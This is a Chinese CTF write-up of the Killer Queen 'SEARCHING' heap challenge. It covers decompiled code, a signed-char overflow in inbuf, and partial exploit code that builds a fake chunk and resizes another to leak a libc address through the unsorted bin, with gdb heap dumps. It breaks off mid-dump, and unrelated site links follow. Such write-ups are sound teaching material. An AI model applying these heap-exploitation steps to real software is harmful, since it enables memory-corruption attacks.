killer queen ctf

Posted 2022-12-07 Y0n1an

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了killer queen ctf相关的知识，希望对你有一定的参考价值。

SEARCHING

先看一下ida的main函数

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)

  int v3; // [rsp+Ch] [rbp-4h]

  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  puts("All my homies hate fufu's.");
  puts("You can use my program, but don't be fufu.\\n");
  while ( 1 )
  
    v3 = menu();
    if ( v3 == 4 )
      break;
    if ( v3 <= 4 )
    
      switch ( v3 )
      
        case 3:
          reset();
          break;
        case 1:
          create();
          break;
        case 2:
          display();
          break;
      
    
  
  puts("Bye.");
  _exit(0);

看一下create函数，create函数先读入了index，判断是不是0，只有index = 0才会进行工作，会free之前的chunk0，然后输入size分配一个新的chunk，然后用inbuf函数分配新的函数

int create()

  int v1; // [rsp+8h] [rbp-8h]
  int v2; // [rsp+Ch] [rbp-4h]

  puts("You now get to create a chunk.\\n");
  puts("Which index would you like to create a chunk on?");
  v2 = inidx();
  if ( v2 < 0 || v2 > 0 )
    return puts("Invalid index.\\n");
  free(*((void **)&chnk + v2));
  puts("What size chunk do you want?");
  v1 = inidx();
  if ( v1 <= 199 && v1 > 1000 )
    return puts("Invalid size.\\n");
  *((_QWORD *)&chnk + v2) = malloc(v1);
  puts("Input content.");
  inbuf(*((_QWORD *)&chnk + v2), (unsigned int)v1);
  return puts("Chunk created.\\n");

用inbuf读入输入的cotent，inbuf函数会逐步读入我们输入的字符。最后会以’\\n’来结束，并且用一个null来终止我们的输入
这里就有个漏洞了，输入是byte类型，也就是-128到127

int __fastcall inbuf(__int64 a1, int a2)

  char i; // [rsp+1Fh] [rbp-1h]

  for ( i = 0; a2 > i; ++i )
  
    *(_BYTE *)(i + a1) = getc(stdin);
    if ( *(_BYTE *)(i + a1) == 10 )
      break;
  
  *(_BYTE *)(i + a1) = 0;
  return puts(&s);

这是display函数，然后输出

int display()

  int v1; // [rsp+Ch] [rbp-4h]

  puts("You now get to display a chunk.\\n");
  puts("Which index would you like to dispaly?");
  v1 = inidx();
  if ( v1 < 0 || v1 > 0 )
    return puts("Invalid index.\\n");
  puts("Your chunk shows:");
  puts(*((const char **)&chnk + v1));
  return puts("\\nChunk displayed.\\n");

reset清空我们操作的chunk，这样可以防止free

int reset()

  int v1; // [rsp+Ch] [rbp-4h]

  puts("You now get to reset a chunk.\\n");
  puts("Which index would you like to reset?");
  v1 = inidx();
  if ( v1 < 0 || v1 > 0 )
    return puts("Invalid index.\\n");
  chnk[v1] = 0LL;
  return puts("Chunk reset.\\n");

思路就是：
创造一个size为0x420的chunk
free它
创造overlap去泄露libc
创造三个chunk，两个free一个已分配

EXPLOITION

exp：
泄露libc
首先申请三个chunk，然后不管，反正已经分配了

create(0,0x10,b'aAA') <--- chunk D
create(0,0x40, b'VVV') <--- chunk E

create(0,0x90,"FFFFFF") <--- chunk F

通常如果要得到libc的地址会用unsorted bin。去malloc足够大的chunk，在free它的时候最终会进入unsorted bin。libc的地址会被放进fw和bk中，问题是我们现在free大的chunk时它周围没有其他chunk，并且top chunk会合并它
所以我们的想法是去申请足够的chunk让它们加起来的size比0x408多，然后用下溢改变第一个chunk的size为0x421并且free掉它。这样我们就会由至少一个chunk在我们修改size的fake chunk和 top chunk中，这样就不会合并

create(0,0x60,0x20*b'A') <----- chunk A. We will resize this one to 0x421
create(0,0x200,0x20*b'B') <---- chunk B. This one we will use to perform the underflow

create(0,0x70,0x70*b'C') 
reset(0)
create(0,0x70,0x70*b'C')
reset(0)
create(0,0x70,0x70*b'G')
reset(0)
payload= b'R'*16
payload += p64(0x420)
payload += p64(0x61)
payload += p64(0)
payload += p64(0)
create(0,0x70,payload) <------- chunk C. Inside this one we create a fake chunk to pass the chek for freeing into unsorted bin


reset(0)
payload = b'B' * 0x7e <------ payload to overflow char
payload += b"\\x00" * 10 <-------- some padding so the next line lands on the size of chunk A
payload += p64(0x421) <----- this will overwrite the size of chunk A to 0x421 using the underflow
create(0,0x200,payload) <---- chunk B that is returned from tcache

所有在chunkC和chunkB的将会以至于当A被重新修改并且free的时候A + 0x420这个地址会指向我们控制的fake chunk

0x56257ccda3a0: 0x0000000000000000  0x0000000000000071 <--- chunk A
0x56257ccda3b0: 0x0000000000000000  0x000056257ccda010 
0x56257ccda3c0: 0x4141414141414141  0x4141414141414141
0x56257ccda3d0: 0x0000000000000000  0x0000000000000000
0x56257ccda3e0: 0x0000000000000000  0x0000000000000000
0x56257ccda3f0: 0x0000000000000000  0x0000000000000000
0x56257ccda400: 0x0000000000000000  0x0000000000000000
0x56257ccda410: 0x0000000000000000  0x0000000000000211 <--- chunk B
0x56257ccda420: 0x4242424242424242  0x4242424242424242
0x56257ccda430: 0x4242424242424242  0x4242424242424242
0x56257ccda440: 0x0000000000000000  0x0000000000000000
0x56257ccda450: 0x0000000000000000  0x0000000000000000
0x56257ccda460: 0x0000000000000000  0x0000000000000000
0x56257ccda470: 0x0000000000000000  0x0000000000000000
0x56257ccda480: 0x0000000000000000  0x0000000000000000
0x56257ccda490: 0x0000000000000000  0x0000000000000000
0x56257ccda4a0: 0x0000000000000000  0x0000000000000000
0x56257ccda620: 0x0000000000000000  0x0000000000000081
0x56257ccda630: 0x4343434343434343  0x4343434343434343
0x56257ccda640: 0x4343434343434343  0x4343434343434343
0x56257ccda650: 0x4343434343434343  0x4343434343434343
0x56257ccda660: 0x4343434343434343  0x4343434343434343
0x56257ccda670: 0x4343434343434343  0x4343434343434343
0x56257ccda680: 0x4343434343434343  0x4343434343434343
0x56257ccda690: 0x4343434343434343  0x4343434343434343
0x56257ccda6a0: 0x0000000000000000  0x0000000000000081
0x56257ccda6b0: 0x4343434343434343  0x4343434343434343
0x56257ccda6c0: 0x4343434343434343  0x4343434343434343
0x56257ccda6d0: 0x4343434343434343  0x4343434343434343
0x56257ccda6e0: 0x4343434343434343  0x4343434343434343
0x56257ccda6f0: 0x4343434343434343  0x4343434343434343
0x56257ccda700: 0x4343434343434343  0x4343434343434343
0x56257ccda710: 0x4343434343434343  0x4343434343434343
0x56257ccda720: 0x0000000000000000  0x0000000000000081
0x56257ccda730: 0x4747474747474747  0x4747474747474747
0x56257ccda740: 0x4747474747474747  0x4747474747474747
0x56257ccda750: 0x4747474747474747  0x4747474747474747
0x56257ccda760: 0x4747474747474747  0x4747474747474747
0x56257ccda770: 0x4747474747474747  0x4747474747474747
0x56257ccda780: 0x4747474747474747  0x4747474747474747
0x56257ccda790: 0x4747474747474747  0x4747474747474747
0x56257ccda7a0: 0x0000000000000000  0x0000000000000081
0x56257ccda7b0: 0x5252525252525252  0x5252525252525252
0x56257ccda7c0: 0x0000000000000420  0x0000000000000061 <--- fake chunk to pass the check
0x56257ccda7d0: 0x0000000000000000  0x0000000000000000
0x56257ccda7e0: 0x0000000000000000  0x0000000000000000
0x56257ccda7f0: 0x0000000000000000  0x0000000000000000
0x56257ccda800: 0x0000000000000000  0x0000000000000000
0x56257ccda810: 0x0000000000000000  0x0000000000000000
0x56257ccda820: 0x0000000000000000  0x00000000000207e1 <--- top chunk

修改后

0x56257ccda3a0: 0x0000000000000000  0x0000000000000421 <--- chunk A that we resized using the underflow
0x56257ccda3b0: 0x0000000000000000  0x000056257ccda010
0x56257ccda3c0: 0x4141414141414141  0x4141414141414141
0x56257ccda3d0: 0x0000000000000000  0x0000000000000000
0x56257ccda3e0: 0x0000000000000000  0x0000000000000000
0x56257ccda3f0: 0x0000000000000000  0x0000000000000000
0x56257ccda400: 0x0000000000000000  0x0000000000000000
0x56257ccda410: 0x0000000000000000  0x0000000000000211
0x56257ccda420: 0x4242424242424242  0x4242424242424242
0x56257ccda430: 0x4242424242424242  0x4242424242424242
0x56257ccda440: 0x4242424242424242  0x4242424242424242
0x56257ccda450: 0x4242424242424242  0x4242424242424242
0x56257ccda460: 0x4242424242424242  0x4242424242424242
0x56257ccda470: 0x4242424242424242  0x4242424242424242
0x56257ccda480: 0x4242424242424242  0x4242424242424242
0x56257ccda490: 0x4242424242424242  0x0000424242424242
0x56257ccda4a0: 0x0000000000000000  0x0000000000000000
0x56257ccda4b0: 0x0000000000000000  0x0000000000000000
0x56257ccda4c0: 0x0000000000000000  0x0000000000000000
0x56257ccda4d0: 0x0000000000000000  0x0000000000000000
0x56257ccda4e0: 0x0000000000000000  0x0000000000000000
0x56257ccda4f0: 0x0000000000000000  0x0000000000000000
0x56257ccda500: 0x0000000000000000  0x0000000000000000
0x56257ccda510: 0x0000000000000000  0x0000000000000000
0x56257ccda520: 0x0000000000000000  0x0000000000000000
0x56257ccda530: 0x0000000000000000  0x0000000000000000
0x56257ccda540: 0x0000000000000000  0x0000000000000000
0x56257ccda550: 0x0000000000000000  0x0000000000000000
0x56257ccda560: 0x0000000000000000  0x0000000000000000
0x56257ccda570: 0x0000000000000000  0x0000000000000000
0x56257ccda580: 0x0000000000000000  0x0000000000000000
0x56257ccda590: 0x0000000000000000  0x0000000000000000
0x56257ccda5a0: 0x0000000000000000  0x0000000000000000
0x56257ccda5b0: 0x0000000000000000  0x0000000000000000
0x56257ccda5c0: 0x0000000000000000  0x0000000000000000
0x56257ccda5d0: 0x0000000000000000  0x0000000000000000
0x56257ccda5e0: 0x0000000000000000  0x0000000000000000
0x56257ccda5f0: 0x0000000000000000  0x0000000000000000
0x56257ccda600: 0x0000000000000000  0x0000000000000000
0x56257ccda610: 0x0000000000000000  0x0000000000000000
0x56257ccda620: 0x0000000000000000  0x0000000000000081
0x56257ccda630: 0x4343434343434343  0x4343434343434343
0x56257ccda640: 0x4343434343434343  0x4343434343434343
0x56257ccda650: 0x4343434343434343  0x4343434343434343
0x56257ccda660: 0x4343434343434343  0x4343434343434343
0x56257ccda670: 0x4343434343434343  0x4343434343434343
0x56257ccda680: 0x4343434343434343  0x4343434343434343
0x56257ccda690: 0x4343434343434343  0x4343434343434343
0x56257ccda6a0: 0x0000000000000000  0x0000000000000081
0x56257ccda6b0: 0x4343434343434343  0x4343434343434343
0x56257ccda6c0: 0x4343434343434343  0x4343434343434343
0x56257ccda6d0: 0x4343434343434343  0x4343434343434343
0x56257ccda6e0: 0x4343434343434343  0x4343434343434343
0x56257ccda6f0: 0x4343434343434343  0x4343434343434343
0x56257ccda700: 0x4343434343434343  0x4343434343434343
0x56257ccda710: 0x4343434343434343  0x4343434343434343
0x56257ccda720: 0x0000000000000000  0x0000000000000081
0x56257ccda730: 0x4747474747474747  0x4747474747474747
0x56257ccda740: 0x4747474747474747  0x4747474747474747
0x56257ccda750: 0x4747474747474747  0x4747474747474747
0x56257ccda760: 0x4747474747474747  0x4747474747474747
0x56257ccda770: 0x4747474747474747  0x4747474747474747
0x56257ccda780: 0x4747474747474747  0x4747474747474747
0x56257ccda790: 0x4747474747474747  0x4747474747474747
0x56257ccda7a0: 0x0000000000000000  0x0000000000000081
0x56257ccda7b0: 0x5252525252525252  0x5252525252525252
0x56257ccda7c0: 0x0000000000000420  0x0000000000000061 
0x56257ccda7d0: 0x0000000000000000  0x0000000000000000
0x56257ccda7e0: 0x0000000000000000  0x0000000000000000
0x56257ccda7f0: 0x0000000000000000  0x0000000000000000
0x56257ccda800: 0x0000000000000000  0x0000000000000000
0x56257ccda810: 0x0000000000000000  0x0000000000000000
0x56257ccda820: 0x0000000000000000  0x00000000000207e1

现在可以有0x421大小的chunk，我们可以free它，这样free了chunkA相当于free chunkB，所以在我们free之前，我们要malloc一下

create(0,0x60,0x8*b'F')
create(0,0xe0,b'WWWWWWWW')

这样就会把0x60的chunkA还回来，即使它现在是0x421，因为我们free的时候是0x70而且它存在tcache[0x70]中
然后申请0xe0
这样，内存分布为

0x56257ccda3a0: 0x0000000000000000  0x00000000000000f1 <--- the new chunk size 0xe0 we just allocated
0x56257ccda3b0: 0x5757575757575757  0x00007f6a2f4adf00
0x56257ccda3c0: 0x000056257ccda3a0  0x000056257ccda3a0
0x56257ccda3d0: 0x0000000000000000  0x0000000000000000
0x56257ccda3e0: 0x0000000000000000  0x0000000000000000
0x56257ccda3f0: 0x0000000000000000  0x0000000000000000
0x56257ccda400: 0x0000000000000000  0x0000000000000000
0x56257ccda410: 0x0000000000000000  0x0000000000000211 <--- chunk B - still freed
0x56257ccda420: 0x0000000000000000  0x000056257ccda010
0x56257ccda430: 0x4242424242424242  0x4242424242424242
0x56257ccda440: 0x4242424242424242  0x4242424242424242
0x56257ccda450: 0x4242424242424242  0x4242424242424242
0x56257ccda460: 0x4242424242424242  0x4242424242424242
0x56257ccda470: 0x4242424242424242  0x4242424242424242
0x56257ccda480: 0x4242424242424242  0x4242424242424242
0x56257ccda490: 0x4242424242424242  0x0000000000000331 <--- chunk A that shrunk 
0x56257ccda4a0: 0x00007f6a2f4adbe0  0x00007f6a2f4adbe0 <--- libc address we are trying to leak
0x56257ccda4b0: 0x0000000000000000  0x0000000000000000
0x56257ccda4c0: 0x0000000000000000  0x0000000000000000
0x56257ccda4d0: 0x0000000000000000  0x0000000000000000
0x56257ccda4e0: 0x0000000000000000  0x0000000000000000
0x56257ccda4f0: 0x0000000000000000  0x0000000000000000
0x56257ccda500: 0x0000000000000000  0x0000000000000000
0x56257ccda510: 0x0000000000000000  0x0000000000000000
0x56257ccda520: 0x0000000000000000  0x0000000000000000
0x56257ccda530: 0x0000000000000000  0x0000000000000000
0x56257ccda540: 0x0000000000000000  0x0000000000000000
0x56257ccda550: 0x0000000000000000  0x0000000000000000
0x56257ccda560: 0x0000000000000000  0x0000000000000000
0x56257ccda570: 0x0000000000000000  0x0000000000000000
0x56257ccda580: 0x0000000000000000  0x0000000000000000
0x56257ccda590: 0x0000000000000000  0x0000000000000000
0x56257ccda5a0: 0x0000000000000000  0x0000000000000000
0x56257ccda5b0: 0x0000000000000000  0x0000000000000000
0x56257ccda5c0: 0x0000000000000000  0x0000000000000000
0x56257ccda5d0: 0x0000000000000000  0x0000000000000000
0x56257ccda5e0: 0x0000000000000000  0x0000000000000000
0x56257ccda5f0: 0x0000000000000000  0x0000000000000000
0x56257ccda600: 0x0000000000000000  0x0000000000000000
0x56257ccda610: 0x0000000000000000  0x0000000000000000
0x56257ccda620: 0x0000000000000000  0x0000000000000081
0x56257ccda630: 0x4343434343434343  0x4343434343434343
0x56257ccda640: 0x4343434343434343  0x4343434343434343
0x56257ccda650: 0x4343434343434343  0x4343434343434343
0x56257ccda660: 0x4343434343434343  0x4343434343434343
0x56257ccda670: 0x4343434343434343  0x4343434343434343
0x56257ccda680: 0x4343434343434343  0x4343434343434343
0x56257ccda690: 0x4343434343434343  0x4343434343434343
0x56257ccda6a0: 0x0000000000000000  0x0000000000000081
0x56257ccda6b0: 0x4343434343434343  0x4343434343434343
0x56257ccda6c0: 0x4343434343434343  0x4343434343434343
0x56257ccda6d0: 0x4343434343434343  0x4343434343434343
0x56257ccda6e0: 0x4343434343434343  0x4343434343434343
0x56257ccda6f0: 0x4343434343434343  0x4343434343434343
0x56257ccda700: 0x4343434343434343  0x4343434343434343
0x56257ccda710: 0x4343434343434343  0x4343434343434343
0x56257ccda720: 0x0000000000000000  0x0000000000000081
0x56257ccda730以上是关于killer queen ctf的主要内容，如果未能解决你的问题，请参考以下文章 
 killer queen ctf
 KILL QUEEN CTF
 KILL QUEEN CTF
 Android Killer v1.2.0 Beta 编译失败求帮助
 python多任务之进程队列queen
 linux oom-killer